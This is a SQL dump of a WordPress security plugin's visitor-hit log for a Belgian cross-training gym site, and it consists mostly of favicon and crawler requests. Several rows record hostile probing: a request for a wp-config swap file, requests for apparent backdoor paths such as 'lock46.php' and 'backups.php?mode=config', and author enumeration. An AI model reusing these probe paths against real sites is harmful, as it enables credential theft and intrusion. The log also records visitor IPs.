(76948, 1499677633.484619, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76949, 1499677634.056461, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76950, 1499677634.516452, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76951, 1499677635.009688, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76952, 1499677635.523317, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76953, 1499677636.000049, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76954, 1499684999.704908, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76955, 1499687501.655533, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76956, 1499687502.321011, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76957, 1499687502.814882, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76958, 1499687503.237921, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76959, 1499687503.678555, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76960, 1499687504.133946, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76961, 1499687504.749321, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76962, 1499687505.201057, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76963, 1499687505.631662, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76964, 1499687506.092583, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76965, 1499687506.517647, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76966, 1499689996.942235, 1584228905, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76967, 1499690263.356607, 633034955, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/uploader.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76968, 1499691334.809262, 3107193141, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76969, 1499698074.498893, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76970, 1499698075.022622, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76971, 1499698075.509689, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76972, 1499698075.939634, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76973, 1499698076.379976, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76974, 1499698076.822748, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76975, 1499698077.317913, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76976, 1499698077.767758, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76977, 1499698078.191418, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76978, 1499698078.625375, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76979, 1499698079.063445, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76980, 1499698453.482468, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76981, 1499698454.046189, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76982, 1499698454.518223, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76983, 1499698454.954457, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76984, 1499698455.415307, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76985, 1499698455.851321, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76986, 1499698456.334366, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76987, 1499698456.744448, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76988, 1499698457.164033, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76989, 1499698457.586251, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76990, 1499698457.998949, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76991, 1499702971.496586, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76992, 1499703092.741567, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76993, 1499703093.243559, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76994, 1499707019.145364, 84818769, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(76995, 1499707039.449260, 84818769, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(76996, 1499708881.770800, 583808072, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(76997, 1499710914.064997, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76998, 1499710914.511648, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76999, 1499713689.838932, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(77000, 1499713922.280646, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77001, 1499714556.907256, 620874844, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/.wp-config.php.swp', 'http://www.crosstrainingcenter.be/.wp-config.php.swp', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77002, 1499722203.073823, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77003, 1499722203.665020, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77004, 1499722204.135103, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77005, 1499722204.654816, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77006, 1499722205.151489, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77007, 1499722205.579354, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77008, 1499722206.317771, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77009, 1499722206.855817, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77010, 1499722207.311940, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77011, 1499722208.023254, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77012, 1499722208.519800, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77013, 1499722209.137290, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77014, 1499722209.655750, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77015, 1499722210.182478, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77016, 1499733280.615618, 1123632645, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(77017, 1499736701.022361, 1123631127, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77018, 1499736702.466663, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77019, 1499736702.966762, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77020, 1499741958.982372, 84848372, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77021, 1499741959.585982, 84848372, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77022, 1499744636.733261, 2637637397, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77023, 1499746845.086358, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77024, 1499747177.424106, 1379793056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'GoogleEarth/7.1.2.2041(Windows;Microsoft Windows (6.2.9200.0);it;kml:2.2;client:Free;type:default)'),
(77025, 1499747178.606478, 1379793056, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77026, 1499747180.207873, 1379793056, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77027, 1499747206.250998, 3458838893, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(77028, 1499751715.971845, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77029, 1499755510.998288, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77030, 1499755515.416688, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77031, 1499755517.653302, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77032, 1499757172.594310, 3273261687, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77033, 1499757173.348674, 3273261687, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77034, 1499757173.896597, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77035, 1499757174.455516, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77036, 1499757174.896852, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77037, 1499757175.358674, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77038, 1499757175.947212, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77039, 1499757176.441901, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77040, 1499757176.937436, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77041, 1499757177.451781, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77042, 1499757177.882061, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77043, 1499762619.890748, 2631448407, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-admin/includes/lock46.php', 'http://crosstrainingcenter.be/wp-admin/includes/lock46.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77044, 1499764178.260088, 2745986569, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77045, 1499764186.854709, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77046, 1499764196.671359, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77047, 1499764204.077532, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77048, 1499764204.676748, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77049, 1499764205.089543, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77050, 1499764212.296300, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77051, 1499764218.382533, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77052, 1499764223.166673, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77053, 1499766934.170189, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77054, 1499770829.150793, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77055, 1499770829.646396, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77056, 1499770830.068356, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77057, 1499770830.479570, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77058, 1499770831.324270, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77059, 1499770831.771188, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77060, 1499770832.172906, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77061, 1499770832.612925, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77062, 1499770833.014520, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77063, 1499770833.416001, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77064, 1499770833.803215, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77065, 1499770834.261165, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77066, 1499770834.664804, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77067, 1499770835.087259, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77068, 1499775812.509888, 3154445620, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77069, 1499775813.050545, 3154445620, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77070, 1499775813.501846, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77071, 1499775813.961738, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77072, 1499775814.435769, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
